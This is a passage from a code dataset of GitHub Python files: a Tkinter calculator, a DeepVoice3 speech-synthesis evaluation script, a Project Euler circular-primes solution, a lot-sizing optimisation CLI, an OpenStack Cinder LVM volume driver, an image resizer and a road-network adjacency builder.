, pady= 20 , command =lambda :button_add(8))\nbutton_9 = Button(root , text = \"9\" ,padx =40 , pady= 20 , command =lambda :button_add(9))\nbutton_0 = Button(root , text = \"0\" ,padx =40 , pady= 20 , command =lambda :button_add(0))\n\nbutton_clear = Button(root , text = \"CLEAR\" ,padx =26 , pady= 20 , command =lambda :clear_button())\nbutton_addition = Button(root , text = \"+\" ,padx =38 , pady= 20 , command =lambda :button_operation('+'))\nbutton_min = Button(root , text = \"-\" ,padx =38 , pady= 20 , command =lambda :button_operation('-'))\nbutton_prod = Button(root , text = \"*\" ,padx =38 , pady= 20 , command =lambda :button_operation('*'))\nbutton_div = Button(root , text = \"/\" ,padx =38 , pady= 20 , command =lambda :button_operation('/'))\nbutton_equal = Button(root , text = \"=\" ,padx =39 , pady= 20 , command =lambda :equal_operation())\n\n\n\n# * Adding buttons to the screen \n\nbutton_1.grid (column =0 , row = 3 )\nbutton_2.grid (column =1 , row = 3 )\nbutton_3.grid (column =2 , row = 3 )\nbutton_addition.grid (column =3 , row = 3 )\n\nbutton_4.grid (column =0 , row = 2 )\nbutton_5.grid (column =1 , row = 2 )\nbutton_6.grid (column =2 , row = 2 )\nbutton_min.grid (column =3 , row = 2 )\n\nbutton_7.grid (column =0 , row = 1 )\nbutton_8.grid (column =1 , row = 1 )\nbutton_9.grid (column =2 , row = 1 )\nbutton_div.grid (column =3 , row = 1)\n\nbutton_clear.grid (column =0 , row = 4)\nbutton_0.grid (column =1 , row = 4)\nbutton_equal.grid (column =2 , row = 4)\nbutton_prod.grid (column =3 , row = 4)\n\n\nroot.mainloop()\n\n\n\n","repo_name":"qbdq/Calculator_Tkinter","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6104802730","text":"import sys\n\nimport torch\nimport numpy as np\nfrom tqdm import trange\n\nfrom module import DeepVoice3\nfrom utils import griffinlim_collate_fn, \\\n preprocess_with_multi_process, \\\n init_worker_fn, \\\n NumpyDataset, \\\n load_model\nfrom hyperparams import HyperParams as hp\nfrom waveutils import magnitude_db_save_as_wav\n\nfrom torch.utils import data\n\n\ndevice = \"cpu\"\n\n\ndef evaluate(sentence: str, path=None):\n tts = DeepVoice3()\n tts = load_model(tts, path=path).to(device).eval()\n\n input = torch.tensor([[hp.vocab_to_id[c]\n for c in sentence\n if c in hp.id_to_vocab]]).to(device)\n\n decoder_init_state = torch.zeros(\n (1, hp.reduction_factor, hp.mel_bands)\n ).to(device)\n\n with torch.no_grad():\n _, mag, _, _ = tts(input=input,\n init_state=decoder_init_state)\n mag = mag.squeeze(0).detach().cpu().numpy()\n magnitude_db_save_as_wav(mag, \"/tmp/hoge.wav\")\n\n\ndef test():\n dataset = NumpyDataset(metadata=\"./../dataset/LJSpeech-1.1/metadata.csv\",\n root=\"./../dataset/LJSpeech-1.1/preprocessed/\",\n vocab_to_id=hp.vocab_to_id,\n id_to_vocab=hp.id_to_vocab)\n train_dataloader = data.DataLoader(dataset,\n batch_size=1,\n shuffle=True,\n num_workers=1,\n # pin_memory=True,\n collate_fn=griffinlim_collate_fn,\n worker_init_fn=init_worker_fn)\n tts = DeepVoice3()\n tts = load_model(tts).to(device).eval()\n for label_mel_db, label_mag_db, label_done, frame_mask, \\\n script, script_mask in train_dataloader:\n zeros = torch.zeros(\n (label_mel_db.size(0), hp.reduction_factor, hp.mel_bands)\n )\n label_mel_db = torch.cat([zeros, label_mel_db], dim=1).to(device)\n frame_mask = frame_mask.unsqueeze(2).to(device)\n script_mask = script_mask.unsqueeze(2).to(device)\n mel, mag, done, attn = tts(\n input=script.to(device),\n decoder_input=label_mel_db[:, :-hp.reduction_factor],\n frame_mask=frame_mask,\n script_mask=script_mask)\n # from matplotlib import pyplot as plt\n # mel_ = mel.squeeze(0).detach().numpy()\n # plt.imshow(mel_.T)\n # plt.show()\n mag = mag.squeeze(0).detach().cpu().numpy()\n magnitude_db_save_as_wav(mag, \"/tmp/hoge.wav\")\n break\n\nif __name__ == \"__main__\":\n hp.mode = \"generate\"\n if len(sys.argv) > 1:\n path = sys.argv[1]\n while True:\n evaluate(input(), path)\n else:\n path=None\n evaluate(\"there's a way to measure the acute emotional intelligence that has never gone out of style.\", path)\n # evaluate(\"icassp stands for the international conference on acoustics, speech and signal processing.\", path)\n # evaluate(\"printing, in the only sense with which we are at present concerned, differs from most if not from all the arts and crafts represented in the Exhibition.\")\n # test()\n","repo_name":"tsubota-kouga/DeepVoice3","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"18030912235","text":"\"\"\"\nThe number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime\n\nThere are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.\n\nHow many circular primes are there below one million?\n\"\"\"\nimport numpy as np\n\n\ndef prime(n):\n if n in allprimes:\n return True\n for i in range(2, n // 2 + 1):\n if n % i == 0:\n return False\n return True\n\n\ndef listtonum(lst):\n times = 0\n while lst[0] == 0:\n times += 1\n lst.pop(0)\n num = 0\n for i in range(len(lst)):\n num += lst[i] * (10 ** (len(lst) - i - 1))\n return num * (10 ** times)\n\n\ndef shift(n: int):\n \"\"\"\n shifts a number to the left\n :param n: the number\n :return: the shifted number\n \"\"\"\n n = list(map(int, str(n)))\n n.insert(0, n.pop())\n return listtonum(n)\n\n\ndef primesfrom2to(n):\n # No idea how it works, no idea what it means\n sieve = np.ones(n // 3 + (n % 6 == 2), dtype=np.bool)\n for i in range(1, int(n ** 0.5) // 3 + 1):\n if sieve[i]:\n k = 3 * i + 1 | 1\n sieve[k * k // 3::2 * k] = False\n sieve[k * (k - 2 * (i & 1) + 4) // 3::2 * k] = False\n return np.r_[2, 3, ((3 * np.nonzero(sieve)[0][1:] + 1) | 1)]\n\n\ndef checkallshifts(n):\n for i in range(len(str(n)) - 1):\n n = shift(n)\n if not prime(n):\n return 0\n return 1\n\n\ncount = 0\nallprimes = primesfrom2to(10 ** 2)\nfor primes in allprimes:\n count += checkallshifts(primes)\nprint(count)\n","repo_name":"yavidor/EulerProject","sub_path":"Problem35.py","file_name":"Problem35.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20778992111","text":"#!/usr/bin/env python3\n\nimport logging\nfrom argparse import ArgumentParser\nfrom enum import Enum\n\nfrom lot_sizing.model import MipModel, Input\n\n\nclass Linearisation(Enum):\n COMPACT = 1 # based on Liberti's linearisation\n EXTENDED = 2 # based on network flow formulation\n SIMPLE = 3 # based on Glover-Woolsey linearisation\n\n\nmodule_logger = logging.getLogger('main')\n\ncmd_parser = ArgumentParser(\n description='Integer programming formulations for the discrete, single-machine, multi-item, single-level lot sizing problem.')\ncmd_parser.add_argument('-f', '--file', metavar=\"input_file\", type=str,\n help='File containing the input data',\n required=True)\ncmd_parser.add_argument('--lin', type=int, choices=range(1, 4), required=True,\n help='Specifies which linearisation should be used: 1-compact, 2-extended, 3-glover_woolsey')\ncmd_parser.add_argument('-s', '--solver', type=str, default='SCIP',\n help='Specifies the solver used by ortools. Default is SCIP.')\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n cmd_args = cmd_parser.parse_args()\n prob_input = Input.read_file(cmd_args.file)\n linearisation = Linearisation(cmd_args.lin)\n if linearisation == Linearisation.COMPACT:\n mip_model = MipModel.build_liberti_formulation(prob_input, cmd_args.solver)\n elif linearisation == Linearisation.EXTENDED:\n mip_model = MipModel.build_network_flow_formulation(prob_input, cmd_args.solver)\n elif linearisation == Linearisation.SIMPLE:\n mip_model = MipModel.build_glover_woolsey_formulation(prob_input, cmd_args.solver)\n else:\n raise RuntimeError('Unexpected linearisation.')\n schedule, cost = mip_model.compute_optimal_schedule()\n module_logger.info(f'Computed schedule: {schedule}')\n module_logger.info(f'Objective value: {cost}')\n","repo_name":"asbestian/lot_sizing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"14848731121","text":"import math\nimport os\nimport socket\n\nfrom oslo.config import cfg\n\nfrom cinder.brick import exception as brick_exception\nfrom cinder.brick.local_dev import lvm as lvm\nfrom cinder import exception\nfrom cinder.image import image_utils\nfrom cinder.openstack.common import fileutils\nfrom cinder.openstack.common import log as logging\nfrom cinder.openstack.common import processutils\nfrom cinder import units\nfrom cinder import utils\nfrom cinder.volume import driver\nfrom cinder.volume import utils as volutils\n\nLOG = logging.getLogger(__name__)\n\nvolume_opts = [\n cfg.StrOpt('volume_group',\n default='cinder-volumes',\n help='Name for the VG that will contain exported volumes'),\n cfg.IntOpt('lvm_mirrors',\n default=0,\n help='If set, create lvms with multiple mirrors. Note that '\n 'this requires lvm_mirrors + 2 pvs with available space'),\n cfg.StrOpt('lvm_type',\n default='default',\n help='Type of LVM volumes to deploy; (default or thin)'),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(volume_opts)\n\n\nclass LVMVolumeDriver(driver.VolumeDriver):\n \"\"\"Executes commands relating to Volumes.\"\"\"\n\n VERSION = '2.0.0'\n\n def __init__(self, vg_obj=None, *args, **kwargs):\n super(LVMVolumeDriver, self).__init__(*args, **kwargs)\n self.configuration.append_config_values(volume_opts)\n self.hostname = socket.gethostname()\n self.vg = vg_obj\n self.backend_name =\\\n self.configuration.safe_get('volume_backend_name') or 'LVM'\n self.protocol = 'local'\n\n def set_execute(self, execute):\n self._execute = execute\n\n def check_for_setup_error(self):\n \"\"\"Verify that requirements are in place to use LVM driver.\"\"\"\n if self.vg is None:\n root_helper = utils.get_root_helper()\n try:\n self.vg = lvm.LVM(self.configuration.volume_group,\n root_helper,\n lvm_type=self.configuration.lvm_type,\n executor=self._execute)\n except brick_exception.VolumeGroupNotFound:\n message = (\"Volume Group %s does not exist\" %\n self.configuration.volume_group)\n raise exception.VolumeBackendAPIException(data=message)\n\n vg_list = volutils.get_all_volume_groups(\n self.configuration.volume_group)\n vg_dict = \\\n (vg for vg in vg_list if vg['name'] == self.vg.vg_name).next()\n if vg_dict is None:\n message = (\"Volume Group %s does not exist\" %\n self.configuration.volume_group)\n raise exception.VolumeBackendAPIException(data=message)\n\n if self.configuration.lvm_type == 'thin':\n # Specific checks for using Thin provisioned LV's\n if not volutils.supports_thin_provisioning():\n message = (\"Thin provisioning not supported \"\n \"on this version of LVM.\")\n raise exception.VolumeBackendAPIException(data=message)\n\n pool_name = \"%s-pool\" % self.configuration.volume_group\n if self.vg.get_volume(pool_name) is None:\n try:\n self.vg.create_thin_pool(pool_name)\n except processutils.ProcessExecutionError as exc:\n exception_message = (\"Failed to create thin pool, \"\n \"error message was: %s\"\n % exc.stderr)\n raise exception.VolumeBackendAPIException(\n data=exception_message)\n\n def _sizestr(self, size_in_g):\n if int(size_in_g) == 0:\n return '100m'\n return '%sg' % size_in_g\n\n def _volume_not_present(self, volume_name):\n return self.vg.get_volume(volume_name) is None\n\n def _delete_volume(self, volume, is_snapshot=False):\n \"\"\"Deletes a logical volume.\"\"\"\n if self.configuration.volume_clear != 'none' and \\\n self.configuration.lvm_type != 'thin':\n self._clear_volume(volume, is_snapshot)\n\n name = volume['name']\n if is_snapshot:\n name = self._escape_snapshot(volume['name'])\n self.vg.delete(name)\n\n def _clear_volume(self, volume, is_snapshot=False):\n # zero out old volumes to prevent data leaking between users\n # TODO(ja): reclaiming space should be done lazy and low priority\n if is_snapshot:\n # if the volume to be cleared is a snapshot of another volume\n # we need to clear out the volume using the -cow instead of the\n # directly volume path. We need to skip this if we are using\n # thin provisioned LVs.\n # bug# lp1191812\n dev_path = self.local_path(volume) + \"-cow\"\n else:\n dev_path = self.local_path(volume)\n\n # TODO(jdg): Maybe we could optimize this for snaps by looking at\n # the cow table and only overwriting what's necessary?\n # for now we're still skipping on snaps due to hang issue\n if not os.path.exists(dev_path):\n msg = (_('Volume device file path %s does not exist.')\n % dev_path)\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n size_in_g = volume.get('size', volume.get('volume_size', None))\n if size_in_g is None:\n msg = (_(\"Size for volume: %s not found, \"\n \"cannot secure delete.\") % volume['id'])\n LOG.error(msg)\n raise exception.InvalidParameterValue(msg)\n\n # clear_volume expects sizes in MiB, we store integer GiB\n # be sure to convert before passing in\n vol_sz_in_meg = size_in_g * units.KiB\n\n volutils.clear_volume(\n vol_sz_in_meg, dev_path,\n volume_clear=self.configuration.volume_clear,\n volume_clear_size=self.configuration.volume_clear_size)\n\n def _escape_snapshot(self, snapshot_name):\n # Linux LVM reserves name that starts with snapshot, so that\n # such volume name can't be created. Mangle it.\n if not snapshot_name.startswith('snapshot'):\n return snapshot_name\n return '_' + snapshot_name\n\n def _create_volume(self, name, size, lvm_type, mirror_count, vg=None):\n vg_ref = self.vg\n if vg is not None:\n vg_ref = vg\n\n vg_ref.create_volume(name, size, lvm_type, mirror_count)\n\n def create_volume(self, volume):\n \"\"\"Creates a logical volume.\"\"\"\n mirror_count = 0\n if self.configuration.lvm_mirrors:\n mirror_count = self.configuration.lvm_mirrors\n\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n self.configuration.lvm_type,\n mirror_count)\n\n def create_volume_from_snapshot(self, volume, snapshot):\n \"\"\"Creates a volume from a snapshot.\"\"\"\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n self.configuration.lvm_type,\n self.configuration.lvm_mirrors)\n\n # Some configurations of LVM do not automatically activate\n # ThinLVM snapshot LVs.\n self.vg.activate_lv(snapshot['name'], is_snapshot=True)\n\n # copy_volume expects sizes in MiB, we store integer GiB\n # be sure to convert before passing in\n volutils.copy_volume(self.local_path(snapshot),\n self.local_path(volume),\n snapshot['volume_size'] * units.KiB,\n self.configuration.volume_dd_blocksize,\n execute=self._execute)\n\n def delete_volume(self, volume):\n \"\"\"Deletes a logical volume.\"\"\"\n\n # NOTE(jdg): We don't need to explicitly call\n # remove export here because we already did it\n # in the manager before we got here.\n\n if self._volume_not_present(volume['name']):\n # If the volume isn't present, then don't attempt to delete\n return True\n\n if self.vg.lv_has_snapshot(volume['name']):\n LOG.error(_('Unabled to delete due to existing snapshot '\n 'for volume: %s') % volume['name'])\n raise exception.VolumeIsBusy(volume_name=volume['name'])\n\n self._delete_volume(volume)\n\n def create_snapshot(self, snapshot):\n \"\"\"Creates a snapshot.\"\"\"\n\n self.vg.create_lv_snapshot(self._escape_snapshot(snapshot['name']),\n snapshot['volume_name'],\n self.configuration.lvm_type)\n\n def delete_snapshot(self, snapshot):\n \"\"\"Deletes a snapshot.\"\"\"\n if self._volume_not_present(self._escape_snapshot(snapshot['name'])):\n # If the snapshot isn't present, then don't attempt to delete\n LOG.warning(_(\"snapshot: %s not found, \"\n \"skipping delete operations\") % snapshot['name'])\n return True\n\n # TODO(yamahata): zeroing out the whole snapshot triggers COW.\n # it's quite slow.\n self._delete_volume(snapshot, is_snapshot=True)\n\n def local_path(self, volume, vg=None):\n if vg is None:\n vg = self.configuration.volume_group\n # NOTE(vish): stops deprecation warning\n escaped_group = vg.replace('-', '--')\n escaped_name = self._escape_snapshot(volume['name']).replace('-', '--')\n return \"/dev/mapper/%s-%s\" % (escaped_group, escaped_name)\n\n def copy_image_to_volume(self, context, volume, image_service, image_id):\n \"\"\"Fetch the image from image_service and write it to the volume.\"\"\"\n image_utils.fetch_to_raw(context,\n image_service,\n image_id,\n self.local_path(volume),\n self.configuration.volume_dd_blocksize,\n size=volume['size'])\n\n def copy_volume_to_image(self, context, volume, image_service, image_meta):\n \"\"\"Copy the volume to the specified image.\"\"\"\n image_utils.upload_volume(context,\n image_service,\n image_meta,\n self.local_path(volume))\n\n def create_cloned_volume(self, volume, src_vref):\n \"\"\"Creates a clone of the specified volume.\"\"\"\n\n mirror_count = 0\n if self.configuration.lvm_mirrors:\n mirror_count = self.configuration.lvm_mirrors\n LOG.info(_('Creating clone of volume: %s') % src_vref['id'])\n volume_name = src_vref['name']\n temp_id = 'tmp-snap-%s' % volume['id']\n temp_snapshot = {'volume_name': volume_name,\n 'size': src_vref['size'],\n 'volume_size': src_vref['size'],\n 'name': 'clone-snap-%s' % volume['id'],\n 'id': temp_id}\n\n self.create_snapshot(temp_snapshot)\n\n # copy_volume expects sizes in MiB, we store integer GiB\n # be sure to convert before passing in\n try:\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n self.configuration.lvm_type,\n mirror_count)\n\n self.vg.activate_lv(temp_snapshot['name'], is_snapshot=True)\n\n volutils.copy_volume(\n self.local_path(temp_snapshot),\n self.local_path(volume),\n src_vref['size'] * units.KiB,\n self.configuration.volume_dd_blocksize,\n execute=self._execute)\n finally:\n self.delete_snapshot(temp_snapshot)\n\n def clone_image(self, volume, image_location, image_id, image_meta):\n return None, False\n\n def backup_volume(self, context, backup, backup_service):\n \"\"\"Create a new backup from an existing volume.\"\"\"\n volume = self.db.volume_get(context, backup['volume_id'])\n volume_path = self.local_path(volume)\n with utils.temporary_chown(volume_path):\n with fileutils.file_open(volume_path) as volume_file:\n backup_service.backup(backup, volume_file)\n\n def restore_backup(self, context, backup, volume, backup_service):\n \"\"\"Restore an existing backup to a new or existing volume.\"\"\"\n volume_path = self.local_path(volume)\n with utils.temporary_chown(volume_path):\n with fileutils.file_open(volume_path, 'wb') as volume_file:\n backup_service.restore(backup, volume['id'], volume_file)\n\n def get_volume_stats(self, refresh=False):\n \"\"\"Get volume status.\n\n If 'refresh' is True, run update the stats first.\n \"\"\"\n\n if refresh:\n self._update_volume_stats()\n\n return self._stats\n\n def _update_volume_stats(self):\n \"\"\"Retrieve stats info from volume group.\"\"\"\n\n LOG.debug(_(\"Updating volume stats\"))\n if self.vg is None:\n LOG.warning(_('Unable to update stats on non-initialized '\n 'Volume Group: %s'), self.configuration.volume_group)\n return\n\n self.vg.update_volume_group_info()\n data = {}\n\n # Note(zhiteng): These information are driver/backend specific,\n # each driver may define these values in its own config options\n # or fetch from driver specific configuration file.\n data[\"volume_backend_name\"] = self.backend_name\n data[\"vendor_name\"] = 'Open Source'\n data[\"driver_version\"] = self.VERSION\n data[\"storage_protocol\"] = self.protocol\n\n if self.configuration.lvm_mirrors > 0:\n data['total_capacity_gb'] =\\\n self.vg.vg_mirror_size(self.configuration.lvm_mirrors)\n data['free_capacity_gb'] =\\\n self.vg.vg_mirror_free_space(self.configuration.lvm_mirrors)\n elif self.configuration.lvm_type == 'thin':\n data['total_capacity_gb'] = self.vg.vg_thin_pool_size\n data['free_capacity_gb'] = self.vg.vg_thin_pool_free_space\n else:\n data['total_capacity_gb'] = self.vg.vg_size\n data['free_capacity_gb'] = self.vg.vg_free_space\n data['reserved_percentage'] = self.configuration.reserved_percentage\n data['QoS_support'] = False\n data['location_info'] =\\\n ('LVMVolumeDriver:%(hostname)s:%(vg)s'\n ':%(lvm_type)s:%(lvm_mirrors)s' %\n {'hostname': self.hostname,\n 'vg': self.configuration.volume_group,\n 'lvm_type': self.configuration.lvm_type,\n 'lvm_mirrors': self.configuration.lvm_mirrors})\n\n self._stats = data\n\n def extend_volume(self, volume, new_size):\n \"\"\"Extend an existing volume's size.\"\"\"\n self.vg.extend_volume(volume['name'],\n self._sizestr(new_size))\n\n def manage_existing(self, volume, existing_ref):\n \"\"\"Manages an existing LV.\n\n Renames the LV to match the expected name for the volume.\n Error checking done by manage_existing_get_size is not repeated.\n \"\"\"\n lv_name = existing_ref['lv_name']\n lv = self.vg.get_volume(lv_name)\n\n # Attempt to rename the LV to match the OpenStack internal name.\n try:\n self.vg.rename_volume(lv_name, volume['name'])\n except processutils.ProcessExecutionError as exc:\n exception_message = (_(\"Failed to rename logical volume %(name)s, \"\n \"error message was: %(err_msg)s\")\n % {'name': lv_name,\n 'err_msg': exc.stderr})\n raise exception.VolumeBackendAPIException(\n data=exception_message)\n\n def manage_existing_get_size(self, volume, existing_ref):\n \"\"\"Return size of an existing LV for manage_existing.\n\n existing_ref is a dictionary of the form:\n {'lv_name': }\n \"\"\"\n\n # Check that the reference is valid\n if 'lv_name' not in existing_ref:\n reason = _('Reference must contain lv_name element.')\n raise exception.ManageExistingInvalidReference(\n existing_ref=existing_ref, reason=reason)\n lv_name = existing_ref['lv_name']\n lv = self.vg.get_volume(lv_name)\n\n # Raise an exception if we didn't find a suitable LV.\n if not lv:\n kwargs = {'existing_ref': lv_name,\n 'reason': 'Specified logical volume does not exist.'}\n raise exception.ManageExistingInvalidReference(**kwargs)\n\n # LV size is returned in gigabytes. Attempt to parse size as a float\n # and round up to the next integer.\n try:\n lv_size = int(math.ceil(float(lv['size'])))\n except ValueError:\n exception_message = (_(\"Failed to manage existing volume \"\n \"%(name)s, because reported size %(size)s \"\n \"was not a floating-point number.\")\n % {'name': lv_name,\n 'size': lv['size']})\n raise exception.VolumeBackendAPIException(\n data=exception_message)\n return lv_size\n\n\nclass LVMISCSIDriver(LVMVolumeDriver, driver.ISCSIDriver):\n \"\"\"Executes commands relating to ISCSI volumes.\n\n We make use of model provider properties as follows:\n\n ``provider_location``\n if present, contains the iSCSI target information in the same\n format as an ietadm discovery\n i.e. ':, '\n\n ``provider_auth``\n if present, contains a space-separated triple:\n ' '.\n `CHAP` is the only auth_method in use at the moment.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.db = kwargs.get('db')\n self.target_helper = self.get_target_helper(self.db)\n super(LVMISCSIDriver, self).__init__(*args, **kwargs)\n self.backend_name =\\\n self.configuration.safe_get('volume_backend_name') or 'LVM_iSCSI'\n self.protocol = 'iSCSI'\n\n def set_execute(self, execute):\n super(LVMISCSIDriver, self).set_execute(execute)\n if self.target_helper is not None:\n self.target_helper.set_execute(execute)\n\n def _create_target(self, iscsi_name, iscsi_target,\n volume_path, chap_auth, lun=0,\n check_exit_code=False, old_name=None):\n # NOTE(jdg): tgt driver has an issue where with a lot of activity\n # (or sometimes just randomly) it will get *confused* and attempt\n # to reuse a target ID, resulting in a target already exists error\n # Typically a simple retry will address this\n\n # For now we have this while loop, might be useful in the\n # future to throw a retry decorator in common or utils\n attempts = 2\n while attempts > 0:\n attempts -= 1\n try:\n # NOTE(jdg): For TgtAdm case iscsi_name is all we need\n # should clean this all up at some point in the future\n tid = self.target_helper.create_iscsi_target(\n iscsi_name,\n iscsi_target,\n 0,\n volume_path,\n chap_auth,\n check_exit_code=check_exit_code,\n old_name=old_name)\n break\n\n except brick_exception.ISCSITargetCreateFailed:\n if attempts == 0:\n raise\n else:\n LOG.warning(_('Error creating iSCSI target, retrying '\n 'creation for target: %s') % iscsi_name)\n return tid\n\n def ensure_export(self, context, volume):\n volume_name = volume['name']\n iscsi_name = \"%s%s\" % (self.configuration.iscsi_target_prefix,\n volume_name)\n volume_path = \"/dev/%s/%s\" % (self.configuration.volume_group,\n volume_name)\n # NOTE(jdg): For TgtAdm case iscsi_name is the ONLY param we need\n # should clean this all up at some point in the future\n model_update = self.target_helper.ensure_export(context, volume,\n iscsi_name,\n volume_path)\n if model_update:\n self.db.volume_update(context, volume['id'], model_update)\n\n def create_export(self, context, volume):\n return self._create_export(context, volume)\n\n def _create_export(self, context, volume, vg=None):\n \"\"\"Creates an export for a logical volume.\"\"\"\n if vg is None:\n vg = self.configuration.volume_group\n\n volume_path = \"/dev/%s/%s\" % (vg, volume['name'])\n\n data = self.target_helper.create_export(context, volume, volume_path)\n return {\n 'provider_location': data['location'],\n 'provider_auth': data['auth'],\n }\n\n def remove_export(self, context, volume):\n self.target_helper.remove_export(context, volume)\n\n def migrate_volume(self, ctxt, volume, host, thin=False, mirror_count=0):\n \"\"\"Optimize the migration if the destination is on the same server.\n\n If the specified host is another back-end on the same server, and\n the volume is not attached, we can do the migration locally without\n going through iSCSI.\n \"\"\"\n\n false_ret = (False, None)\n if volume['status'] != 'available':\n return false_ret\n if 'location_info' not in host['capabilities']:\n return false_ret\n info = host['capabilities']['location_info']\n try:\n (dest_type, dest_hostname, dest_vg, lvm_type, lvm_mirrors) =\\\n info.split(':')\n lvm_mirrors = int(lvm_mirrors)\n except ValueError:\n return false_ret\n if (dest_type != 'LVMVolumeDriver' or dest_hostname != self.hostname):\n return false_ret\n\n if dest_vg != self.vg.vg_name:\n vg_list = volutils.get_all_volume_groups()\n try:\n (vg for vg in vg_list if vg['name'] == dest_vg).next()\n except StopIteration:\n message = (\"Destination Volume Group %s does not exist\" %\n dest_vg)\n LOG.error(_('%s'), message)\n return false_ret\n\n helper = utils.get_root_helper()\n dest_vg_ref = lvm.LVM(dest_vg, helper,\n lvm_type=lvm_type,\n executor=self._execute)\n self.remove_export(ctxt, volume)\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n lvm_type,\n lvm_mirrors,\n dest_vg_ref)\n\n volutils.copy_volume(self.local_path(volume),\n self.local_path(volume, vg=dest_vg),\n volume['size'],\n self.configuration.volume_dd_blocksize,\n execute=self._execute)\n self._delete_volume(volume)\n model_update = self._create_export(ctxt, volume, vg=dest_vg)\n\n return (True, model_update)\n\n def _iscsi_location(self, ip, target, iqn, lun=None):\n return \"%s:%s,%s %s %s\" % (ip, self.configuration.iscsi_port,\n target, iqn, lun)\n\n def _iscsi_authentication(self, chap, name, password):\n return \"%s %s %s\" % (chap, name, password)\n\n\nclass LVMISERDriver(LVMISCSIDriver, driver.ISERDriver):\n \"\"\"Executes commands relating to ISER volumes.\n\n We make use of model provider properties as follows:\n\n ``provider_location``\n if present, contains the iSER target information in the same\n format as an ietadm discovery\n i.e. ':, '\n\n ``provider_auth``\n if present, contains a space-separated triple:\n ' '.\n `CHAP` is the only auth_method in use at the moment.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.target_helper = self.get_target_helper(kwargs.get('db'))\n LVMVolumeDriver.__init__(self, *args, **kwargs)\n self.backend_name =\\\n self.configuration.safe_get('volume_backend_name') or 'LVM_iSER'\n self.protocol = 'iSER'\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/cinder/cinder/volume/drivers/lvm.py","file_name":"lvm.py","file_ext":"py","file_size_in_byte":24906,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"26185421359","text":"import os\nfrom PIL import Image\nfrom sys import argv, exit\n\ndef resizing_images():\n def getopts(argv):\n opts = {}\n while argv:\n if argv[0][0] == '-':\n opts[argv[0]] = argv[1]\n argv = argv[2:]\n else:\n argv = argv[1:]\n if '-w' not in opts:\n print('You must enter working directory!')\n exit([0])\n\n return opts\n\n def resizer(opts):\n workpath = opts['-w']\n default_opts = {'-d': '../{}{}/'.format(workpath.split('\\\\')[-1], '-resized'),\n '-px': 150,\n '-pf': ''}\n\n if '-d' in opts: default_opts['-d'] = opts['-d']\n if '-px' in opts: default_opts['-px'] = int(opts['-px'])\n if '-pf' in opts: default_opts['-pf'] = opts['-pf']\n workpath = opts['-w']\n destination = default_opts['-d']\n picture_size = default_opts['-px']\n postfix = default_opts['-pf']\n try:\n os.chdir(workpath)\n print('Working directory {}'.format(os.getcwd()))\n except OSError:\n print('No such file or directory')\n exit([0])\n try:\n os.makedirs(destination)\n print('Directory {} created'.format(destination))\n except OSError:\n pass\n\n for file in os.listdir():\n try:\n out = Image.open(file)\n sides = out.size\n if sides[0] > sides[1]:\n original_size = out.crop(\n ((sides[0] - sides[1]) // 2, 0, sides[0] - (sides[0] - sides[1]) // 2, sides[1]))\n else:\n original_size = out.crop(\n (0, (sides[1] - sides[0]) // 2, sides[0], sides[1] - (sides[1] - sides[0]) // 2))\n original_size.thumbnail((picture_size, picture_size))\n original_size.save('{}/{}{}.jpg'.format(destination, file.split('.')[0], postfix), \"JPEG\")\n print('Image {} converted'.format(file))\n except IOError:\n pass\n\n opts = getopts(argv)\n resizer(opts)\n\nresizing_images()\n","repo_name":"shimielder/resize-utility","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41086089974","text":"import json\nimport numpy as np\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nimport os\nfrom scipy.sparse import csr_matrix\nfrom copy import copy\n\n\nclass NpEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n if isinstance(obj, np.floating):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return super(NpEncoder, self).default(obj)\n\ndef GetCityAdjacencyMatrix(cityname):\n\n print(f'Processing {cityname} road network')\n\n # load the xml file with the city map\n tree = ET.parse(f'results/net/{cityname}_road_network.net.xml')\n root = tree.getroot()\n df_road = pd.DataFrame(list(map(lambda x: [x.get('id'), x.get('from'), x.get('to')], \\\n root.findall('.//edge'))), columns = ['id', 'source', 'target']).dropna()\n\n all_nodes = np.unique(df_road[['source', 'target']])\n n = len(all_nodes)\n\n # create and save a mapper between the nodes names and integers between 1 and n\n NodeMapper = dict(zip(all_nodes, np.arange(n)))\n with open(f'results/net/NodeMapper_{cityname}.json', 'w') as json_file:\n json.dump(NodeMapper, json_file, cls=NpEncoder)\n\n # generate and save the edge\n df_road['pid1'] = df_road.source.map(lambda x: NodeMapper[x])\n df_road['pid2'] = df_road.target.map(lambda x: NodeMapper[x])\n df_road[['pid1', 'pid2']].rename(columns = {'pid1': 'source', 'pid2': 'target'}).to_csv(f'results/net/EL_{cityname}.csv', index = False)\n\n # create a mapping from edges to nodes and save it\n Edge2source = dict(df_road[['id', 'pid1']].values)\n 